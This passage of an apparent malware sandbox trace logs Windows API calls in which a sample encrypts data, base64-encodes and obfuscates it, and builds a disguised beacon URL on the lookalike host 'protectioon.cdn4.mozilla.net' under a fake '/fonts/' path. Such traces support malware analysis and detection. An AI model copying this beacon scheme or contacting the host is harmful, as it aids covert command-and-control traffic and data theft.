hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2c59c40*, pdwDataLen=0x11ff074*=0x10, dwBufLen=0x20 | out: pbData=0x2c59c40*, pdwDataLen=0x11ff074*=0x10) returned 1 [0140.326] memcpy (in: _Dst=0x2c59c50, _Src=0x2c59b78, _Size=0x10 | out: _Dst=0x2c59c50) returned 0x2c59c50 [0140.326] CryptEncrypt (in: hKey=0x77d378, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2c59c50*, pdwDataLen=0x11ff074*=0x10, dwBufLen=0x20 | out: pbData=0x2c59c50*, pdwDataLen=0x11ff074*=0x10) returned 1 [0140.326] memcpy (in: _Dst=0x2c59c60, _Src=0x2c59b88, _Size=0x10 | out: _Dst=0x2c59c60) returned 0x2c59c60 [0140.326] CryptEncrypt (in: hKey=0x77d378, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2c59c60*, pdwDataLen=0x11ff074*=0x10, dwBufLen=0x20 | out: pbData=0x2c59c60*, pdwDataLen=0x11ff074*=0x10) returned 1 [0140.326] memcpy (in: _Dst=0x2c59c70, _Src=0x2c59b98, _Size=0x10 | out: _Dst=0x2c59c70) returned 0x2c59c70 [0140.326] CryptEncrypt (in: hKey=0x77d378, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2c59c70*, pdwDataLen=0x11ff074*=0x10, dwBufLen=0x20 | out: pbData=0x2c59c70*, pdwDataLen=0x11ff074*=0x10) returned 1 [0140.326] memcpy (in: _Dst=0x2c59c80, _Src=0x2c59ba8, _Size=0x10 | out: _Dst=0x2c59c80) returned 0x2c59c80 [0140.326] CryptEncrypt (in: hKey=0x77d378, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2c59c80*, pdwDataLen=0x11ff074*=0x10, dwBufLen=0x20 | out: pbData=0x2c59c80*, pdwDataLen=0x11ff074*=0x10) returned 1 [0140.326] memcpy (in: _Dst=0x2c59c90, _Src=0x2c59bb8, _Size=0x10 | out: _Dst=0x2c59c90) returned 0x2c59c90 [0140.326] CryptEncrypt (in: hKey=0x77d378, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2c59c90*, pdwDataLen=0x11ff074*=0x10, dwBufLen=0x20 | out: pbData=0x2c59c90*, pdwDataLen=0x11ff074*=0x10) returned 1 [0140.326] memcpy (in: _Dst=0x2c59ca0, _Src=0x2c59bc8, _Size=0x10 | out: _Dst=0x2c59ca0) returned 0x2c59ca0 [0140.326] CryptEncrypt (in: hKey=0x77d378, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2c59ca0*, pdwDataLen=0x11ff074*=0x10, dwBufLen=0x20 | out: pbData=0x2c59ca0*, pdwDataLen=0x11ff074*=0x10) returned 1 [0140.326] memcpy (in: _Dst=0x2c59cb0, _Src=0x2c59bd8, _Size=0x10 | out: _Dst=0x2c59cb0) returned 0x2c59cb0 [0140.326] CryptEncrypt (in: hKey=0x77d378, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2c59cb0*, pdwDataLen=0x11ff074*=0x10, dwBufLen=0x20 | out: pbData=0x2c59cb0*, pdwDataLen=0x11ff074*=0x10) returned 1 [0140.326] memcpy (in: _Dst=0x2c59cc0, _Src=0x2c59be8, _Size=0x10 | out: _Dst=0x2c59cc0) returned 0x2c59cc0 [0140.326] CryptEncrypt (in: hKey=0x77d378, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2c59cc0*, pdwDataLen=0x11ff074*=0x10, dwBufLen=0x20 | out: pbData=0x2c59cc0*, pdwDataLen=0x11ff074*=0x20) returned 1 [0140.326] CryptDestroyKey (hKey=0x77d378) returned 1 [0140.326] CryptReleaseContext (hProv=0x7917d8, dwFlags=0x0) [0140.326] CryptReleaseContext (hProv=0x7917d8, dwFlags=0x0) returned 1 [0140.326] RtlAllocateHeap (HeapHandle=0x2860000, Flags=0x0, Size=0x1c0) returned 0x2c5fa40 [0140.327] HeapFree (in: hHeap=0x2860000, dwFlags=0x0, lpMem=0x2c59c00 | out: hHeap=0x2860000) returned 1 [0140.327] HeapFree (in: hHeap=0x2860000, dwFlags=0x0, lpMem=0x2c59b28 | out: hHeap=0x2860000) returned 1 [0140.327] StrTrimA (psz="GFNmN/vEB/f35lBSV9ApL3S13G00GZOEr8CgP4EwtbN3s/JAPFrn1C7uk3Q35fZ2/ODD0k3TH2GpFTCBH926Zd0bJIrfxiH2bAd1pV/rj6afvzbWx6l7tnLZCrx8dQ3IDww0UbTyP9r4mkiOl7K6L7HIN1nLwt+XIaWDA6L0lmiYjVYupGvOAXZVLSRtvhdghxhwrnXxzKsmOPzS1IFDfKozh2s5luF+9XJC17m8rzdS5t8BRD5NYmPJyeFBNTn+WZJqYU4n0QAEAHOesDgNVXEI8TzOIXbGz2uqAgrLTr/=", pszTrimChars="\r\n=") [0140.327] StrTrimA (in: psz="GFNmN/vEB/f35lBSV9ApL3S13G00GZOEr8CgP4EwtbN3s/JAPFrn1C7uk3Q35fZ2/ODD0k3TH2GpFTCBH926Zd0bJIrfxiH2bAd1pV/rj6afvzbWx6l7tnLZCrx8dQ3IDww0UbTyP9r4mkiOl7K6L7HIN1nLwt+XIaWDA6L0lmiYjVYupGvOAXZVLSRtvhdghxhwrnXxzKsmOPzS1IFDfKozh2s5luF+9XJC17m8rzdS5t8BRD5NYmPJyeFBNTn+WZJqYU4n0QAEAHOesDgNVXEI8TzOIXbGz2uqAgrLTr/=", pszTrimChars="\r\n=" | out: psz="GFNmN/vEB/f35lBSV9ApL3S13G00GZOEr8CgP4EwtbN3s/JAPFrn1C7uk3Q35fZ2/ODD0k3TH2GpFTCBH926Zd0bJIrfxiH2bAd1pV/rj6afvzbWx6l7tnLZCrx8dQ3IDww0UbTyP9r4mkiOl7K6L7HIN1nLwt+XIaWDA6L0lmiYjVYupGvOAXZVLSRtvhdghxhwrnXxzKsmOPzS1IFDfKozh2s5luF+9XJC17m8rzdS5t8BRD5NYmPJyeFBNTn+WZJqYU4n0QAEAHOesDgNVXEI8TzOIXbGz2uqAgrLTr/") returned 1 [0140.327] lstrlenA (lpString="GFNmN/vEB/f35lBSV9ApL3S13G00GZOEr8CgP4EwtbN3s/JAPFrn1C7uk3Q35fZ2/ODD0k3TH2GpFTCBH926Zd0bJIrfxiH2bAd1pV/rj6afvzbWx6l7tnLZCrx8dQ3IDww0UbTyP9r4mkiOl7K6L7HIN1nLwt+XIaWDA6L0lmiYjVYupGvOAXZVLSRtvhdghxhwrnXxzKsmOPzS1IFDfKozh2s5luF+9XJC17m8rzdS5t8BRD5NYmPJyeFBNTn+WZJqYU4n0QAEAHOesDgNVXEI8TzOIXbGz2uqAgrLTr/") returned 299 [0140.328] RtlAllocateHeap (HeapHandle=0x2860000, Flags=0x0, Size=0x382) returned 0x2c5fc08 [0140.328] _snprintf (_Dest=0x2c5fc0d, _Count=0x4, _Format="%c%02X") [0140.328] _snprintf (in: _Dest=0x2c5fc0d, _Count=0x4, _Format="%c%02X" | out: _Dest="_2F") returned 3 [0140.328] _snprintf (in: _Dest=0x2c5fc13, _Count=0x4, _Format="%c%02X" | out: _Dest="_2F") returned 3 [0140.328] _snprintf (in: _Dest=0x2c5fc39, _Count=0x4, _Format="%c%02X" | out: _Dest="_2F") returned 3 [0140.328] _snprintf (in: _Dest=0x2c5fc4e, _Count=0x4, _Format="%c%02X" | out: _Dest="_2F") returned 3 [0140.328] _snprintf (in: _Dest=0x2c5fc76, _Count=0x4, _Format="%c%02X" | out: _Dest="_2F") returned 3 [0140.328] _snprintf (in: _Dest=0x2c5fcb0, _Count=0x4, _Format="%c%02X" | out: _Dest="_2B") returned 3 [0140.328] _snprintf (in: _Dest=0x2c5fcf3, _Count=0x4, _Format="%c%02X" | out: _Dest="_2B") returned 3 [0140.328] _snprintf (in: _Dest=0x2c5fd15, _Count=0x4, _Format="%c%02X" | out: _Dest="_2B") returned 3 [0140.328] _snprintf (in: _Dest=0x2c5fd42, _Count=0x4, _Format="%c%02X" | out: _Dest="_2F") returned 3 [0140.329] HeapFree (in: hHeap=0x2860000, dwFlags=0x0, lpMem=0x2c5fa40 | out: hHeap=0x2860000) returned 1 [0140.329] lstrlenA (lpString="GFNmN_2FvEB_2Ff35lBSV9ApL3S13G00GZOEr8CgP4EwtbN3s_2FJAPFrn1C7uk3Q35fZ2_2FODD0k3TH2GpFTCBH926Zd0bJIrfxiH2bAd1pV_2Frj6afvzbWx6l7tnLZCrx8dQ3IDww0UbTyP9r4mkiOl7K6L7HIN1nLwt_2BXIaWDA6L0lmiYjVYupGvOAXZVLSRtvhdghxhwrnXxzKsmOPzS1IFDfKozh2s5luF_2B9XJC17m8rzdS5t8BRD5NYmPJyeFBNTn_2BWZJqYU4n0QAEAHOesDgNVXEI8TzOIXbGz2uqAgrLTr_2F") returned 317 [0140.329] RtlAllocateHeap (HeapHandle=0x2860000, Flags=0x0, Size=0x165) returned 0x2c5fa40 [0140.329] memcpy (in: _Dst=0x2c5fa40, _Src=0x2c5fc08, _Size=0x9 | out: _Dst=0x2c5fa40) returned 0x2c5fa40 [0140.329] memcpy (in: _Dst=0x2c5fa4a, _Src=0x2c5fc11, _Size=0x14 | out: _Dst=0x2c5fa4a) returned 0x2c5fa4a [0140.329] memcpy (in: _Dst=0x2c5fa5f, _Src=0x2c5fc25, _Size=0x13 | out: _Dst=0x2c5fa5f) returned 0x2c5fa5f [0140.329] memcpy (in: _Dst=0x2c5fa73, _Src=0x2c5fc38, _Size=0x16 | out: _Dst=0x2c5fa73) returned 0x2c5fa73 [0140.329] memcpy (in: _Dst=0x2c5fa8a, _Src=0x2c5fc4e, _Size=0xd | out: _Dst=0x2c5fa8a) returned 0x2c5fa8a [0140.329] memcpy (in: _Dst=0x2c5fa98, _Src=0x2c5fc5b, _Size=0x8 | out: _Dst=0x2c5fa98) returned 0x2c5fa98 [0140.329] memcpy (in: _Dst=0x2c5faa1, _Src=0x2c5fc63, _Size=0x17 | out: _Dst=0x2c5faa1) returned 0x2c5faa1 [0140.329] memcpy (in: _Dst=0x2c5fab9, _Src=0x2c5fc7a, _Size=0xa | out: _Dst=0x2c5fab9) returned 0x2c5fab9 [0140.329] memcpy (in: _Dst=0x2c5fac4, _Src=0x2c5fc84, _Size=0x11 | out: _Dst=0x2c5fac4) returned 0x2c5fac4 [0140.329] memcpy (in: _Dst=0x2c5fad6, _Src=0x2c5fc95, _Size=0xc | out: _Dst=0x2c5fad6) returned 0x2c5fad6 [0140.329] memcpy (in: _Dst=0x2c5fae3, _Src=0x2c5fca1, _Size=0xb | out: _Dst=0x2c5fae3) returned 0x2c5fae3 [0140.329] memcpy (in: _Dst=0x2c5faef, _Src=0x2c5fcac, _Size=0xe | out: _Dst=0x2c5faef) returned 0x2c5faef [0140.329] memcpy (in: _Dst=0x2c5fafe, _Src=0x2c5fcba, _Size=0x15 | out: _Dst=0x2c5fafe) returned 0x2c5fafe [0140.329] memcpy (in: _Dst=0x2c5fb14, _Src=0x2c5fccf, _Size=0x10 | out: _Dst=0x2c5fb14) returned 0x2c5fb14 [0140.329] memcpy (in: _Dst=0x2c5fb25, _Src=0x2c5fcdf, _Size=0xf | out: _Dst=0x2c5fb25) returned 0x2c5fb25 [0140.329] memcpy (in: _Dst=0x2c5fb35, _Src=0x2c5fcee, _Size=0x12 | out: _Dst=0x2c5fb35) returned 0x2c5fb35 [0140.329] memcpy (in: _Dst=0x2c5fb48, _Src=0x2c5fd00, _Size=0x9 | out: _Dst=0x2c5fb48) returned 0x2c5fb48 [0140.329] memcpy (in: _Dst=0x2c5fb52, _Src=0x2c5fd09, _Size=0x14 | out: _Dst=0x2c5fb52) returned 0x2c5fb52 [0140.329] memcpy (in: _Dst=0x2c5fb67, _Src=0x2c5fd1d, _Size=0x13 | out: _Dst=0x2c5fb67) returned 0x2c5fb67 [0140.329] memcpy (in: _Dst=0x2c5fb7b, _Src=0x2c5fd30, _Size=0x11 | out: _Dst=0x2c5fb7b) returned 0x2c5fb7b [0140.329] memcpy (in: _Dst=0x2c5fb8d, _Src=0x2c5fd41, _Size=0x5 | out: _Dst=0x2c5fb8d) returned 0x2c5fb8d [0140.330] HeapFree (in: hHeap=0x2860000, dwFlags=0x0, lpMem=0x2c5fc08 | out: hHeap=0x2860000) returned 1 [0140.330] HeapFree (in: hHeap=0x2860000, dwFlags=0x0, lpMem=0x2c5ea50 | out: hHeap=0x2860000) returned 1 [0140.330] StrTrimA (in: psz="GFNmN_2Fv/EB_2Ff35lBSV9ApL3S13/G00GZOEr8CgP4EwtbN3/s_2FJAPFrn1C7uk3Q35fZ2/_2FODD0k3TH2G/pFTCBH92/6Zd0bJIrfxiH2bAd1pV_2Fr/j6afvzbWx6/l7tnLZCrx8dQ3IDww/0UbTyP9r4mki/Ol7K6L7HIN1/nLwt_2BXIaWDA6/L0lmiYjVYupGvOAXZVLSR/tvhdghxhwrnXxzKs/mOPzS1IFDfKozh2/s5luF_2B9XJC17m8rz/dS5t8BRD5/NYmPJyeFBNTn_2BWZJqY/U4n0QAEAHOesDgNVXEI/8TzOIXbGz2uqAgrLT/r_2F", pszTrimChars="\r\n" | out: psz="GFNmN_2Fv/EB_2Ff35lBSV9ApL3S13/G00GZOEr8CgP4EwtbN3/s_2FJAPFrn1C7uk3Q35fZ2/_2FODD0k3TH2G/pFTCBH92/6Zd0bJIrfxiH2bAd1pV_2Fr/j6afvzbWx6/l7tnLZCrx8dQ3IDww/0UbTyP9r4mki/Ol7K6L7HIN1/nLwt_2BXIaWDA6/L0lmiYjVYupGvOAXZVLSR/tvhdghxhwrnXxzKs/mOPzS1IFDfKozh2/s5luF_2B9XJC17m8rz/dS5t8BRD5/NYmPJyeFBNTn_2BWZJqY/U4n0QAEAHOesDgNVXEI/8TzOIXbGz2uqAgrLT/r_2F") returned 0 [0140.330] lstrlenA (lpString="/fonts/") returned 7 [0140.330] lstrlenA (lpString="GFNmN_2Fv/EB_2Ff35lBSV9ApL3S13/G00GZOEr8CgP4EwtbN3/s_2FJAPFrn1C7uk3Q35fZ2/_2FODD0k3TH2G/pFTCBH92/6Zd0bJIrfxiH2bAd1pV_2Fr/j6afvzbWx6/l7tnLZCrx8dQ3IDww/0UbTyP9r4mki/Ol7K6L7HIN1/nLwt_2BXIaWDA6/L0lmiYjVYupGvOAXZVLSR/tvhdghxhwrnXxzKs/mOPzS1IFDfKozh2/s5luF_2B9XJC17m8rz/dS5t8BRD5/NYmPJyeFBNTn_2BWZJqY/U4n0QAEAHOesDgNVXEI/8TzOIXbGz2uqAgrLT/r_2F") returned 337 [0140.330] RtlAllocateHeap (HeapHandle=0x2860000, Flags=0x0, Size=0x159) returned 0x2c59b28 [0140.330] lstrcpyA (in: lpString1=0x2c59b28, lpString2="/fonts/" | out: lpString1="/fonts/") returned="/fonts/" [0140.330] lstrcatA (in: lpString1="/fonts/", lpString2="GFNmN_2Fv/EB_2Ff35lBSV9ApL3S13/G00GZOEr8CgP4EwtbN3/s_2FJAPFrn1C7uk3Q35fZ2/_2FODD0k3TH2G/pFTCBH92/6Zd0bJIrfxiH2bAd1pV_2Fr/j6afvzbWx6/l7tnLZCrx8dQ3IDww/0UbTyP9r4mki/Ol7K6L7HIN1/nLwt_2BXIaWDA6/L0lmiYjVYupGvOAXZVLSR/tvhdghxhwrnXxzKs/mOPzS1IFDfKozh2/s5luF_2B9XJC17m8rz/dS5t8BRD5/NYmPJyeFBNTn_2BWZJqY/U4n0QAEAHOesDgNVXEI/8TzOIXbGz2uqAgrLT/r_2F" | out: lpString1="/fonts/GFNmN_2Fv/EB_2Ff35lBSV9ApL3S13/G00GZOEr8CgP4EwtbN3/s_2FJAPFrn1C7uk3Q35fZ2/_2FODD0k3TH2G/pFTCBH92/6Zd0bJIrfxiH2bAd1pV_2Fr/j6afvzbWx6/l7tnLZCrx8dQ3IDww/0UbTyP9r4mki/Ol7K6L7HIN1/nLwt_2BXIaWDA6/L0lmiYjVYupGvOAXZVLSR/tvhdghxhwrnXxzKs/mOPzS1IFDfKozh2/s5luF_2B9XJC17m8rz/dS5t8BRD5/NYmPJyeFBNTn_2BWZJqY/U4n0QAEAHOesDgNVXEI/8TzOIXbGz2uqAgrLT/r_2F") returned="/fonts/GFNmN_2Fv/EB_2Ff35lBSV9ApL3S13/G00GZOEr8CgP4EwtbN3/s_2FJAPFrn1C7uk3Q35fZ2/_2FODD0k3TH2G/pFTCBH92/6Zd0bJIrfxiH2bAd1pV_2Fr/j6afvzbWx6/l7tnLZCrx8dQ3IDww/0UbTyP9r4mki/Ol7K6L7HIN1/nLwt_2BXIaWDA6/L0lmiYjVYupGvOAXZVLSR/tvhdghxhwrnXxzKs/mOPzS1IFDfKozh2/s5luF_2B9XJC17m8rz/dS5t8BRD5/NYmPJyeFBNTn_2BWZJqY/U4n0QAEAHOesDgNVXEI/8TzOIXbGz2uqAgrLT/r_2F" [0140.330] lstrcpyA (in: lpString1=0x2c5fa40, lpString2=".bak" | out: lpString1=".bak") returned=".bak" [0140.330] lstrcpyA (in: lpString1=0x2c5f238, lpString2="protectioon.cdn4.mozilla.net" | out: lpString1="protectioon.cdn4.mozilla.net") returned="protectioon.cdn4.mozilla.net" [0140.330] lstrcatA (in: lpString1="protectioon.cdn4.mozilla.net", lpString2="/fonts/GFNmN_2Fv/EB_2Ff35lBSV9ApL3S13/G00GZOEr8CgP4EwtbN3/s_2FJAPFrn1C7uk3Q35fZ2/_2FODD0k3TH2G/pFTCBH92/6Zd0bJIrfxiH2bAd1pV_2Fr/j6afvzbWx6/l7tnLZCrx8dQ3IDww/0UbTyP9r4mki/Ol7K6L7HIN1/nLwt_2BXIaWDA6/L0lmiYjVYupGvOAXZVLSR/tvhdghxhwrnXxzKs/mOPzS1IFDfKozh2/s5luF_2B9XJC17m8rz/dS5t8BRD5/NYmPJyeFBNTn_2BWZJqY/U4n0QAEAHOesDgNVXEI/8TzOIXbGz2uqAgrLT/r_2F" | out: lpString1="protectioon.cdn4.mozilla.net/fonts/GFNmN_2Fv/EB_2Ff35lBSV9ApL3S13/G00GZOEr8CgP4EwtbN3/s_2FJAPFrn1C7uk3Q35fZ2/_2FODD0k3TH2G/pFTCBH92/6Zd0bJIrfxiH2bAd1pV_2Fr/j6afvzbWx6/l7tnLZCrx8dQ3IDww/0UbTyP9r4mki/Ol7K6L7HIN1/nLwt_2BXIaWDA6/L0lmiYjVYupGvOAXZVLSR/tvhdghxhwrnXxzKs/mOPzS1IFDfKozh2/s5luF_2B9XJC17m8rz/dS5t8BRD5/NYmPJyeFBNTn_2BWZJqY/U4n0QAEAHOesDgNVXEI/8TzOIXbGz2uqAgrLT/r_2F") returned="protectioon.cdn4.mozilla.net/fonts/GFNmN_2Fv/EB_2Ff35lBSV9ApL3S13/G00GZOEr8CgP4EwtbN3/s_2FJAPFrn1C7uk3Q35fZ2/_2FODD0k3TH2G/pFTCBH92/6Zd0bJIrfxiH2bAd1pV_2Fr/j6afvzbWx6/l7tnLZCrx8dQ3IDww/0UbTyP9r4mki/Ol7K6L7HIN1/nLwt_2BXIaWDA6/L0lmiYjVYupGvOAXZVLSR/tvhdghxhwrnXxzKs/mOPzS1IFDfKozh2/s5luF_2B9XJC17m8rz/dS5t8BRD5/NYmPJyeFBNTn_2BWZJqY/U4n0QAEAHOesDgNVXEI/8TzOIXbGz2uqAgrLT/r_2F" [0140.331] lstrcatA (in: lpString1="protectioon.cdn4.mozilla.net/fonts/GFNmN_2Fv/EB_2Ff35lBSV9ApL3S13/G00GZOEr8CgP4EwtbN3/s_2FJAPFrn1C7uk3Q35fZ2/_2FODD0k3TH2G/pFTCBH92/6Zd0bJIrfxiH2bAd1pV_2Fr/j6afvzbWx6/l7tnLZCrx8dQ3IDww/0UbTyP9r4mki/Ol7K6L7HIN1/nLwt_2BXIaWDA6/L0lmiYjVYupGvOAXZVLSR/tvhdghxhwrnXxzKs/mOPzS1IFDfKozh2/s5luF_2B9XJC17m8rz/dS5t8BRD5/NYmPJyeFBNTn_2BWZJqY/U4n0QAEAHOesDgNVXEI/8TzOIXbGz2uqAgrLT/r_2F", lpString2=".bak" | out: lpString1="protectioon.cdn4.mozilla.net/fonts/GFNmN_2Fv/EB_2Ff35lBSV9ApL3S13/G00GZOEr8CgP4EwtbN3/s_2FJAPFrn1C7uk3Q35fZ2/_2FODD0k3TH2G/pFTCBH92/6Zd0bJIrfxiH2bAd1pV_2Fr/j6afvzbWx6/l7tnLZCrx8dQ3IDww/0UbTyP9r4mki/Ol7K6L7HIN1/nLwt_2BXIaWDA6/L0lmiYjVYupGvOAXZVLSR/tvhdghxhwrnXxzKs/mOPzS1IFDfKozh2/s5luF_2B9XJC17m8rz/dS5t8BRD5/NYmPJyeFBNTn_2BWZJqY/U4n0QAEAHOesDgNVXEI/8TzOIXbGz2uqAgrLT/r_2F.bak") returned="protectioon.cdn4.mozilla.net/fonts/GFNmN_2Fv/EB_2Ff35lBSV9ApL3S13/G00GZOEr8CgP4EwtbN3/s_2FJAPFrn1C7uk3Q35fZ2/_2FODD0k3TH2G/pFTCBH92/6Zd0bJIrfxiH2bAd1pV_2Fr/j6afvzbWx6/l7tnLZCrx8dQ3IDww/0UbTyP9r4mki/Ol7K6L7HIN1/nLwt_2BXIaWDA6/L0lmiYjVYupGvOAXZVLSR/tvhdghxhwrnXxzKs/mOPzS1IFDfKozh2/s5luF_2B9XJC17m8rz/dS5t8BRD5/NYmPJyeFBNTn_2BWZJqY/U4n0QAEAHOesDgNVXEI/8TzOIXbGz2uqAgrLT/r_2F.bak" [0140.331] CreateEventA (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) [0140.331] CreateEventA (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x1c8 [0140.331] CreateEventA (lpEventAttributes=0x0, bManualReset=1, bInitialState=1, lpName=0x0) returned 0x38c [0140.331] lstrlenA (lpString="protectioon.cdn4.mozilla.net/fonts/GFNmN_2Fv/EB_2Ff35lBSV9ApL3S13/G00GZOEr8CgP4EwtbN3/s_2FJAPFrn1C7uk3Q35fZ2/_2FODD0k3TH2G/pFTCBH92/6Zd0bJIrfxiH2bAd1pV_2Fr/j6afvzbWx6/l7tnLZCrx8dQ3IDww/0UbTyP9r4mki/Ol7K6L7HIN1/nLwt_2BXIaWDA6/L0lmiYjVYupGvOAXZVLSR/tvhdghxhwrnXxzKs/mOPzS1IFDfKozh2/s5luF_2B9XJC17m8rz/dS5t8BRD5/NYmPJyeFBNTn_2BWZJqY/U4n0QAEAHOesDgNVXEI/8TzOIXbGz2uqAgrLT/r_2F.bak") returned 376 [0140.331] RtlAllocateHeap (HeapHandle=0x2860000, Flags=0x0, Size=0x179) returned 0x2c5fbb0 [0140.331] RtlAllocateHeap (HeapHandle=0x2860000, Flags=0x0, Size=0x179) returned 0x2c5fd38 [0140.331] StrChrA (lpStart="protectioon.cdn4.mozilla.net/fonts/GFNmN_2Fv/EB_2Ff35lBSV9ApL3S13/G00GZOEr8CgP4EwtbN3/s_2FJAPFrn1C7uk3Q35fZ2/_2FODD0k3TH2G/pFTCBH92/6Zd0bJIrfxiH2bAd1pV_2Fr/j6afvzbWx6/l7tnLZCrx8dQ3IDww/0UbTyP9r4mki/Ol7K6L7HIN1/nLwt_2BXIaWDA6/L0lmiYjVYupGvOAXZVLSR/tvhdghxhwrnXxzKs/mOPzS1IFDfKozh2/s5luF_2B9XJC17m8rz/dS5t8BRD5/NYmPJyeFBNTn_2BWZJqY/U4n0QAEAHOesDgNVXEI/8TzOIXbGz2uqAgrLT/r_2F.bak", wMatch=0x2f) returned="/fonts/GFNmN_2Fv/EB_2Ff35lBSV9ApL3S13/G00GZOEr8CgP4EwtbN3/s_2FJAPFrn1C7uk3Q35fZ2/_2FODD0k3TH2G/pFTCBH92/6Zd0bJIrfxiH2bAd1pV_2Fr/j6afvzbWx6/l7tnLZCrx8dQ3IDww/0UbTyP9r4mki/Ol7K6L7HIN1/nLwt_2BXIaWDA6/L0lmiYjVYupGvOAXZVLSR/tvhdghxhwrnXxzKs/mOPzS1IFDfKozh2/s5luF_2B9XJC17m8rz/dS5t8BRD5/NYmPJyeFBNTn_2BWZJqY/U4n0QAEAHOesDgNVXEI/8TzOIXbGz2uqAgrLT/r_2F.bak" [0140.331] StrChrA (lpStart="protectioon.cdn4.mozilla.net/fonts/GFNmN_2Fv/EB_2Ff35lBSV9ApL3S13/G00GZOEr8CgP4EwtbN3/s_2FJAPFrn1C7uk3Q35fZ2/_2FODD0k3TH2G/pFTCBH92/6Zd0bJIrfxiH2bAd1pV_2Fr/j6afvzbWx6/l7tnLZCrx8dQ3IDww/0UbTyP9r4mki/Ol7K6L7HIN1/nLwt_2BXIaWDA6/L0lmiYjVYupGvOAXZVLSR/tvhdghxhwrnXxzKs/mOPzS1IFDfKozh2/s5luF_2B9XJC17m8rz/dS5t8BRD5/NYmPJyeFBNTn_2BWZJqY/U4n0QAEAHOesDgNVXEI/8TzOIXbGz2uqAgrLT/r_2F.bak", wMatch=0x3f) returned 0x0 [0140.331] memcpy (in: _Dst=0x2c5fbb0, _Src=0x2c5f238, _Size=0x1c | out: _Dst=0x2c5fbb0) returned 0x2c5fbb0 [0140.331] lstrcpyA (in: lpString1=0x2c5fd38, lpString2="/fonts/GFNmN_2Fv/EB_2Ff35lBSV9ApL3S13/G00GZOEr8CgP4EwtbN3/s_2FJAPFrn1C7uk3Q35fZ2/_2FODD0k3TH2G/pFTCBH92/6Zd0bJIrfxiH2bAd1pV_2Fr/j6afvzbWx6/l7tnLZCrx8dQ3IDww/0UbTyP9r4mki/Ol7K6L7HIN1/nLwt_2BXIaWDA6/L0lmiYjVYupGvOAXZVLSR/tvhdghxhwrnXxzKs/mOPzS1IFDfKozh2/s5luF_2B9XJC17m8rz/dS5t8BRD5/NYmPJyeFBNTn_2BWZJqY/U4n0QAEAHOesDgNVXEI/8TzOIXbGz2uqAgrLT/r_2F.bak" | out: lpString1="/fonts/GFNmN_2Fv/EB_2Ff35lBSV9ApL3S13/G00GZOEr8CgP4EwtbN3/s_2FJAPFrn1C7uk3Q35fZ2/_2FODD0k3TH2G/pFTCBH92/6Zd0bJIrfxiH2bAd1pV_2Fr/j6afvzbWx6/l7tnLZCrx8dQ3IDww/0UbTyP9r4mki/Ol7K6L7HIN1/nLwt_2BXIaWDA6/L0lmiYjVYupGvOAXZVLSR/tvhdghxhwrnXxzKs/mOPzS1IFDfKozh2/s5luF_2B9XJC17m8rz/dS5t8BRD5/NYmPJyeFBNTn_2BWZJqY/U4n0QAEAHOesDgNVXEI/8TzOIXbGz2uqAgrLT/r_2F.bak") returned="/fonts/GFNmN_2Fv/EB_2Ff35lBSV9ApL3S13/G00GZOEr8CgP4EwtbN3/s_2FJAPFrn1C7uk3Q35fZ2/_2FODD0k3TH2G/pFTCBH92/6Zd0bJIrfxiH2bAd1pV_2Fr/j6afvzbWx6/l7tnLZCrx8dQ3IDww/0UbTyP9r4mki/Ol7K6L7HIN1/nLwt_2BXIaWDA6/L0lmiYjVYupGvOAXZVLSR/tvhdghxhwrnXxzKs/mOPzS1IFDfKozh2/s5luF_2B9XJC17m8rz/dS5t8BRD5/NYmPJyeFBNTn_2BWZJqY/U4n0QAEAHOesDgNVXEI/8TzOIXbGz2uqAgrLT/r_2F.bak" [0140.331] lstrlenA (lpString="/fonts/GFNmN_2Fv/EB_2Ff35lBSV9ApL3S13/G00GZOEr8CgP4EwtbN3/s_2FJAPFrn1C7uk3Q35fZ2/_2FODD0k3TH2G/pFTCBH92/6Zd0bJIrfxiH2bAd1pV_2Fr/j6afvzbWx6/l7tnLZCrx8dQ3IDww/0UbTyP9r4mki/Ol7K6L7HIN1/nLwt_2BXIaWDA6/L0lmiYjVYupGvOAXZVLSR/tvhdghxhwrnXxzKs/mOPzS1IFDfKozh2/s5luF_2B9XJC17m8rz/dS5t8BRD5/NYmPJyeFBNTn_2BWZJqY/U4n0QAEAHOesDgNVXEI/8TzOIXbGz2uqAgrLT/r_2F.bak") returned 348 [0140.331] RtlAllocateHeap (HeapHandle=0x2860000, Flags=0x0, Size=0x2b9) returned 0x2be00d8 [0140.331] InternetCanonicalizeUrlA (in: lpszUrl="/fonts/GFNmN_2Fv/EB_2Ff35lBSV9ApL3S13/G00GZOEr8CgP4EwtbN3/s_2FJAPFrn1C7uk3Q35fZ2/_2FODD0k3TH2G/pFTCBH92/6Zd0bJIrfxiH2bAd1pV_2Fr/j6afvzbWx6/l7tnLZCrx8dQ3IDww/0UbTyP9r4mki/Ol7K6L7HIN1/nLwt_2BXIaWDA6/L0lmiYjVYupGvOAXZVLSR/tvhdghxhwrnXxzKs/mOPzS1IFDfKozh2/s5luF_2B9XJC17m8rz/dS5t8BRD5/NYmPJyeFBNTn_2BWZJqY/U4n0QAEAHOesDgNVXEI/8TzOIXbGz2uqAgrLT/r_2F.bak", lpszBuffer=0x2be00d8, lpdwBufferLength=0x11ff040, dwFlags=0x0 | out: lpszBuffer="/fonts/GFNmN_2Fv/EB_2Ff35lBSV9ApL3S13/G00GZOEr8CgP4EwtbN3/s_2FJAPFrn1C7uk3Q35fZ2/_2FODD0k3TH2G/pFTCBH92/6Zd0bJIrfxiH2bAd1pV_2Fr/j6afvzbWx6/l7tnLZCrx8dQ3IDww/0UbTyP9r4mki/Ol7K6L7HIN1/nLwt_2BXIaWDA6/L0lmiYjVYupGvOAXZVLSR/tvhdghxhwrnXxzKs/mOPzS1IFDfKozh2/s5luF_2B9XJC17m8rz/dS5t8BRD5/NYmPJyeFBNTn_2BWZJqY/U4n0QAEAHOesDgNVXEI/8TzOIXbGz2uqAgrLT/r_2F.bak", lpdwBufferLength=0x11ff040) returned 1 [0140.332] HeapFree (in: hHeap=0x2860000, dwFlags=0x0, lpMem=0x2c5fd38 